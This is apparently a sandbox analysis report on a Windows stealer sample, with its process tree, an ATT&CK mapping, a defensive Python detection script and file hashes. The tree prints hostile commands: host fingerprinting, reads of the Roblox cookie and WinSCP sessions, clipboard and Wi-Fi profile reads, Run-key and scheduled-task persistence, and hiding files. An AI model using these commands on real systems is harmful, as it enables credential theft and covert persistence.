  [2] PID 4644  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6800  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 4656  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6704  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 4140  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7416  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 1220  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7468  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 5020  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7008  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 5124  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6864  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 5144  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6880  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 5156  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7092  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 5176  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7544  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 5200  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7508  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 5220  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7500  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 5232  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7320  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 5264  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7552  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 5272  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6632  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 5280  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6768  C:\Windows\system32\tasklist.exe  cmdline: tasklist
Elevation check and system fingerprinting (cmd.exe at depth 2, children at depth 3 and 4). net session fails with an access-denied error unless the process is elevated, so it serves as an "am I admin" probe; BackupProductKeyDefault under SoftwareProtectionPlatform holds the Windows product key.

  C:\Windows\system32\cmd.exe /d /s /c "net session"  [PID 5292]
    C:\Windows\system32\net.exe  net session  [PID 7312]
      C:\Windows\system32\net1.exe  C:\Windows\system32\net1 session  [PID 8316]
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"  [PID 5308]
    C:\Windows\System32\Wbem\WMIC.exe  wmic csproduct get uuid  [PID 7624]
  C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"  [PID 5324]
    C:\Windows\System32\Wbem\WMIC.exe  wmic OS get caption, osarchitecture  [PID 7248]
    C:\Windows\system32\more.com  more +1  [PID 7576]
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"  [PID 8988]
    C:\Windows\System32\Wbem\WMIC.exe  wmic cpu get name  [PID 8092]
    C:\Windows\system32\more.com  more +1  [PID 8120]
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"  [PID 3928]
    C:\Windows\System32\Wbem\WMIC.exe  wmic PATH Win32_VideoController get name  [PID 9616]
      signature: Detects videocard installed
    C:\Windows\system32\more.com  more +1  [PID 7576]
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"  [PID 8932]
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault  [PID 10064]
      signature: Suspicious behavior: EnumeratesProcesses
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"  [PID 6100]
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName  [PID 9616]
      signature: Suspicious behavior: EnumeratesProcesses
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"  [PID 10308]
    C:\Windows\system32\tasklist.exe  tasklist  [PID 10348]
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4840 get ExecutablePath"  [PID 10780]
    C:\Windows\System32\Wbem\WMIC.exe  wmic process where processid=4840 get ExecutablePath  [PID 10824]
Installed-software enumeration: the Uninstall key is listed twice and then every subkey it returned is queried individually, each as cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<subkey>"" (cmd.exe at depth 2, reg.exe at depth 3, no sandbox signatures). The subkey names are simply what was installed on the analysis image.

  Uninstall subkey                               cmd.exe PID   reg.exe PID
  (Uninstall key itself)                         10892         10932
  (Uninstall key itself)                         10952         10996
  7-Zip                                          11012         11052
  AddressBook                                    11076         11112
  Connection Manager                             11132         11168
  DirectDrawEx                                   11188         11220
  DXM_Runtime                                    11236         5868
  Fontcore                                       10248         10276
  IE40                                           4432          5668
  IE4Data                                        7248          3532
  IE5BAKEX                                       9348          9420
  IEData                                         9376          9424
  MobileOptionPack                               9604          9732
  Mozilla Firefox 105.0.3 (x64 en-US)            10396         6832
  MozillaMaintenanceService                      3764          8292
  MPlayer2                                       5264          7596
  ProPlusRetail - en-us                          1172          3264
  SchedulingAgent                                4352          4368
  VLC media player                               5356          5620
  WIC                                            10404         6248
  {1D8E6291-B0D5-35EC-8441-6616F567A0F7}         10432         7476
  {37B8F9C7-03FB-3253-8781-2517C99D7C00}         8316          6320
  {5740BD44-B58D-321A-AFC0-6D3D4556DD6C}         8396          7040
  {5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}         7656          6756
  {64A3A4F4-B792-11D6-A78A-00B0D0180381}         5988          8484
  {662A0088-6FCD-45DD-9EA7-68674058AED5}         2316          10460
  {6DB765A8-05AF-49A1-A71D-6F645EE3CE41}         8036          5212
  {77924AE4-039E-4CA4-87B4-2F64180381F0}         6940          8764
  {90160000-007E-0000-1000-0000000FF1CE}         8812          8444
  {90160000-008C-0000-1000-0000000FF1CE}         7724          5020
  {90160000-008C-0409-1000-0000000FF1CE}         5548          8404
  {CB0836EC-B072-368D-82B2-D3470BF95707}         5280          8128
  {CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}         5692          8996
Dropped scripts, security-software and credential probes, and persistence (cmd.exe at depth 2, children at depth 3 and 4). The Run key and the onlogon task both point at a copy of the sample under Themes\CachedFiles\, the daily 12:00PM task at a second copy under Templates\, and a second Run key at a dropped .vbs under Libraries\; the copied exe and the .vbs are then hidden with attrib +h +s. The onlogon task is created with /rl highest, which asks for it to run with the highest privileges available to the user.

  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\kbuL5EmJfXIQ_tezmp.ps1""  [PID 7344]
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\kbuL5EmJfXIQ_tezmp.ps1"  [PID 6588]
      signature: Suspicious behavior: EnumeratesProcesses
  C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\RGyqVfeN3YcR.vbs"  [PID 5032]
    C:\Windows\system32\cscript.exe  cscript C:\Users\Admin\AppData\Roaming\RGyqVfeN3YcR.vbs  [PID 5952]
  C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { ... } Get-AntiVirusProduct ""  [PID 6440]  (full inline script below)
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell -command "function Get-AntiVirusProduct {  [PID 6088]  (command line shown truncated on the page)
      signature: Suspicious behavior: EnumeratesProcesses
    Inline script passed via -command, reflowed one statement per line; it queries the root\SecurityCenter2 WMI namespace for registered antivirus products and decodes productState into definition and real-time-protection status. Its one comment was in French and is translated here:

      function Get-AntiVirusProduct {
          [CmdletBinding()]
          param (
              [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)]
              [Alias('name')]
              $computername=$env:computername
          )
          $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername
          $ret = @()
          foreach ($AntiVirusProduct in $AntiVirusProducts) {
              switch ($AntiVirusProduct.productState) {
                  "262144" { $defstatus = "Up to date";  $rtstatus = "Disabled" }
                  "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" }
                  "266240" { $defstatus = "Up to date";  $rtstatus = "Enabled" }
                  "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" }
                  "393216" { $defstatus = "Up to date";  $rtstatus = "Disabled" }
                  "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" }
                  "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" }
                  "397312" { $defstatus = "Up to date";  $rtstatus = "Enabled" }
                  "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" }
                  "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" }
                  default  { $defstatus = "Unknown";     $rtstatus = "Unknown" }
              }
              $ht = @{}
              $ht.Computername = $computername
              $ht.Name = $AntiVirusProduct.displayName
              $ht.'Product GUID' = $AntiVirusProduct.instanceGuid
              $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe
              $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe
              $ht.'Definition Status' = $defstatus
              $ht.'Real-time Protection Status' = $rtstatus
              # Create a new object for each computer
              $ret += New-Object -TypeName PSObject -Property $ht
          }
          Return $ret
      }
      Get-AntiVirusProduct

  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"  [PID 4708]
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell Get-Clipboard  [PID 8692]
      signature: Suspicious behavior: EnumeratesProcesses
  C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"  [PID 6688]
    C:\Windows\system32\netsh.exe  netsh wlan show profile  [PID 8028]
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""  [PID 3088]
    C:\Windows\system32\reg.exe  C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"  [PID 7952]
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"  [PID 5796]
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY  [PID 7632]
      signature: Suspicious behavior: EnumeratesProcesses
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"  [PID 8156]
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY  [PID 2380]
      signature: Suspicious behavior: EnumeratesProcesses
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupP0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe /f"  [PID 4264]
    C:\Windows\system32\reg.exe  C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupP0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe /f  [PID 5972]
      signature: Adds Run key to start application
  C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest"  [PID 6376]
    C:\Windows\system32\cmd.exe  cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest  [PID 5460]
      C:\Windows\system32\schtasks.exe  schtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest  [PID 2788]
        signature: Creates scheduled task(s)
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\"""  [PID 9232]
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\""  [PID 9308]
      signature: Suspicious behavior: EnumeratesProcesses
      C:\Windows\system32\attrib.exe  "C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe  [PID 6584]
        signature: Views/modifies file attributes
  C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\CurseOfTwilight.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""  [PID 10652]
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell -command "  [PID 10656]  (command line shown truncated on the page)
      signature: Suspicious behavior: EnumeratesProcesses
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"  [PID 1224]
    C:\Windows\system32\tasklist.exe  tasklist  [PID 1728]
      signature: Enumerates processes with tasklist
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_P0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs /f"  [PID 10668]
    C:\Windows\system32\reg.exe  C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_P0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs /f  [PID 5976]
      signature: Adds Run key to start application
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs\"""  [PID 7424]
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs\""  [PID 6136]
      signature: Suspicious behavior: EnumeratesProcesses
      C:\Windows\system32\attrib.exe  "C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs  [PID 9072]
        signature: Views/modifies file attributes
  C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe  "C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2628 --field-trial-handle=1652,i,10145686144927012465,2029700584885424378,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2  [PID 5904]  (Chromium-style GPU helper process spawned by the sample itself, with its user data directory under Roaming\script)
    signature: Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
Privilege Escalation
  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
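The sandbox's ATT&CK mapping lists only the two persistence techniques, but the process tree also records discovery (the tasklist polling, the wmic and registry fingerprinting, the SecurityCenter2 antivirus query), collection (Get-Clipboard, the WinSCP and .ROBLOSECURITY registry reads, netsh wlan show profile) and hiding (attrib +h +s), and every one of those commands is launched as cmd.exe /d /s /c "<command>", the wrapper Node's child_process.exec uses on Windows, which fits the Chromium-style --type=gpu-process child at the end of the tree. The Python below is an added example, not code from the report or from the sample: it turns those observations into rules over process-creation events (the fields Sysmon Event ID 1 or Windows event 4688 provide), strips the cmd.exe wrapper so the rules match the inner command, counts tasklist spawns per parent, and calls the tree a complete chain only when discovery, collection and persistence all appear. The sample events are constructed from the command lines above; the root PID 1000, the polling threshold and the ATT&CK technique IDs in the rules are the editor's assumptions, not the sandbox's output.

```python
"""Detection logic for the discovery -> collection -> persistence chain in this report.

Input: process-creation events with the fields Sysmon Event ID 1 (or Windows 4688)
provide. SAMPLE_EVENTS is constructed from the report's command lines; the root PID is
made up, and the polling threshold and ATT&CK IDs are the editor's choices.
"""
import re
from collections import Counter
from typing import NamedTuple


class ProcEvent(NamedTuple):
    pid: int
    ppid: int
    image: str
    cmdline: str


# Node's child_process.exec runs every command on Windows as: cmd.exe /d /s /c "<command>"
CMD_WRAPPER = re.compile(r'^"?(?:[a-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/d\s+/s\s+/c\s+"(.*)"\s*$', re.I | re.S)


def unwrap(cmdline: str) -> tuple[bool, str]:
    """Return (was_wrapped, inner command) for a cmd.exe /d /s /c "..." command line."""
    m = CMD_WRAPPER.match(cmdline)
    return (True, m.group(1)) if m else (False, cmdline)


# (finding, ATT&CK technique, stage, case-insensitive regex applied to the inner command)
RULES = [
    ("process listing", "T1057", "discovery", r"^tasklist\b"),
    ("elevation probe (net session fails unless elevated)", "-", "discovery", r"^net1?\s+session\b"),
    ("hardware uuid via wmic csproduct", "T1082", "discovery", r"^wmic\s+csproduct\s+get\s+uuid"),
    ("os/cpu/gpu fingerprint via wmic", "T1082", "discovery", r"^wmic\s+(os\s+get|cpu\s+get|path\s+win32_videocontroller)"),
    ("windows product key read", "T1082", "discovery", r"SoftwareProtectionPlatform.*BackupProductKeyDefault"),
    ("installed software enumeration", "T1012", "discovery", r"reg(\.exe)?\s+query\s+\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"),
    ("antivirus enumeration via SecurityCenter2", "T1518.001", "discovery", r"SecurityCenter2.*AntiVirusProduct"),
    ("wi-fi profile enumeration", "T1016.002", "discovery", r"^netsh\s+wlan\s+show\s+profile"),
    ("clipboard read", "T1115", "collection", r"\bGet-Clipboard\b"),
    ("WinSCP saved sessions read", "T1552.002", "collection", r"Martin Prikryl\\WinSCP 2\\Sessions"),
    ("Roblox .ROBLOSECURITY cookie read", "T1552.002", "collection", r"RobloxStudioBrowser.*\.ROBLOSECURITY"),
    ("Run key persistence", "T1547.001", "persistence", r"reg(\.exe)?\s+add\s+\"HK(CU|LM)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\""),
    ("logon task requesting highest run level", "T1053.005", "persistence", r"schtasks\s+/create\b.*\s/sc\s+onlogon\b.*\s/rl\s+highest\b"),
    ("daily task via Register-ScheduledTask", "T1053.005", "persistence", r"\bRegister-ScheduledTask\b"),
    ("payload hidden with attrib +h +s", "T1564.001", "persistence", r"\battrib\s+\+h\s+\+s\b"),
]
POLL_THRESHOLD = 5  # tasklist spawns from one parent before it counts as polling (assumed value)


def analyze(events):
    """Match events against RULES; return findings, polling parents and a chain verdict."""
    findings, tasklist_spawns, stages = [], Counter(), set()
    for ev in events:
        wrapped, inner = unwrap(ev.cmdline)
        for finding, technique, stage, pattern in RULES:
            if re.search(pattern, inner, re.I | re.S):
                findings.append({"pid": ev.pid, "finding": finding, "technique": technique,
                                 "via_cmd_wrapper": wrapped})
                stages.add(stage)
                if finding == "process listing":
                    tasklist_spawns[ev.ppid] += 1
    return {
        "findings": findings,
        "techniques": sorted({f["technique"] for f in findings if f["technique"] != "-"}),
        "polling_parents": sorted(p for p, n in tasklist_spawns.items() if n >= POLL_THRESHOLD),
        "stages": sorted(stages),
        # any single command here is weak evidence; all three stages in one tree is the alert
        "chain_complete": {"discovery", "collection", "persistence"} <= stages,
    }


ROOT = 1000  # constructed stand-in for the Electron main process (not a PID from the report)
W = r'C:\Windows\system32\cmd.exe /d /s /c "%s"'
SAMPLE_EVENTS = [ProcEvent(pid, ROOT, "cmd.exe", W % cmd) for pid, cmd in [
    (1020, "tasklist"), (2216, "tasklist"), (4644, "tasklist"), (4656, "tasklist"), (4140, "tasklist"),
    (5292, "net session"),
    (5308, "wmic csproduct get uuid"),
    (3928, "wmic PATH Win32_VideoController get name | more +1"),
    (8932, r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"),
    (10892, r'C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"'),
    (6440, r'powershell -command "Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct"'),  # abbreviated
    (4708, "powershell Get-Clipboard"),
    (6688, "netsh wlan show profile"),
    (3088, r'C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"'),
    (8156, r"powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"),
    (4264, r'C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupP0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe /f'),
    (6376, r'cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest'),
    (9232, r'powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\""'),
    (10652, "powershell -command \" $Action = New-ScheduledTaskAction -Execute 'C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\CurseOfTwilight.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask \""),
]]

if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for f in result["findings"]:
        print(f"{f['pid']:>6}  {f['technique']:<10} {f['finding']}")
    print("polling:", result["polling_parents"], "stages:", result["stages"], "chain:", result["chain_complete"])
```

Feed it the events of one process tree (the children of one parent PID) rather than a whole host's log: the chain verdict is only meaningful per tree, and the polling count keys on the parent. The regexes are tied to the exact commands seen here on purpose; a variant that renames the Run value or the task still matches, while one that drops the cmd.exe wrapper still matches the rules but loses the via_cmd_wrapper flag that ties the activity to a Node-style launcher.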
Downloads

Filesize: 43KB
MD5: 252b4fda07550496d330d819f15ceb3e
SHA1: 650584312b310219a26d5fc20cb1804bb6c4dde5
SHA256: 39eafade0656a3c0bd723ad576b1f00a0d625ebeef80ac01f965165ffc28cf1d
SHA512: a18529cc7325d3fce5fb5d32a63b74a8e2ff23a027c12fecdc111f14b1c601079512fce3ff5484a686aaa0dd1ea20083570707511541e4a6d7615053f3ffac49

Filesize: 33KB
MD5: c555604e8b6f818991e186342f856b1b
SHA1: 3ae02db8eba2f4fa30cb7567a9f5bf8346faded0
SHA256: 012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972
SHA512: 01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe

Filesize: 1KB
MD5: f0f11cd478cc44d518c16820ede9d253
SHA1: cfaf8d2e071f2ade0894578e5b44e02032d27be4
SHA256: 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb
SHA512: ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

Filesize: 5KB
MD5: 2f0a6a34d9b95bba0e3358ddd41ff2ac
SHA1: f39a9e7aeab9fe86fd9034284516de40186e6e93
SHA256: 6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5
SHA512: a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084

Filesize: 3KB
MD5: 5d574dc518025fad52b7886c1bff0e13
SHA1: 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256: 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA512: 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

Filesize: 1KB
MD5: e4074ed39e5c69f858bb421aca1340ec
SHA1: 03ea9c25f5bafd76bc776024ff46704296406a6a
SHA256: 398daf400c5f021e616a80156051067dc1301bef533e038790d8c0e81a6ed3c0
SHA512: a735d55d7629777f8c98c555e5683858445bc01717c49e581ccff110a23458ea40208e4e8cbdee7394de26037be186ec12c9daeedc830119a635974b7d7328bf

Filesize: 1KB
MD5: 38285a40af0640d0296e043206aad30d
SHA1: 46a830801ee7f66f2b5c52cab3f2b96e9cd39a34
SHA256: 72ac6797720489033fbb9316b2f675c1b4780450c070e535ad462be596405aba
SHA512: c6ad7c07bae31e94f7ca07791f2b657882ea6b867c8ec6ed5404feb7d4e2452284bb762bc46f4c175ebb87ce2946f5c4c0ef3a0272fe53a7e8c1597740b6e3d5

Filesize: 1KB
MD5: 07990a7fccea877d78855cfac2e77acb
SHA1: db2ee2b0627fa0104e8cd4611fb6a0fa693a6e75
SHA256: 9324b64d5d0bf35e4a5746b5f422ebe2fd21e1775e13ce56cd96a5cedb7b8968
SHA512: 9c35af2514b364769a3d219849a96691fdd8ec6849ecee1f83e0c5eb7662f636362bdd048d210fc40739af10ad7815e782523eedf0ce7760bc8d73863a39b93e

Filesize: 1KB
MD5: 70b26c3b6685b7e990384d394ec74652
SHA1: 94f3bb48be15b711b53b5da0bc8a557e79a0ea3b
SHA256: ca7a07c3ed7e449fccad52bd728bf0566b1264e998131bcf9d78fad99eb9c20d
SHA512: 6768131066b1a45e546f3528b66166470b6fd9138ec2a3cf1d9856078ee9c0aa5d3858794440ca3b6fa93f05ff8e3b0078fd7e22935085b2231a059d7c686386

Filesize: 1KB
MD5: b81698463008adf1ef84be81148f67a2
SHA1: 63b8b9fef1c60e224999a7df8cbb86d9570789d4
SHA256: 317833f8b129ab3409489e6302b4c5284cbcc67afa87f858a1b5bc399345ebb1
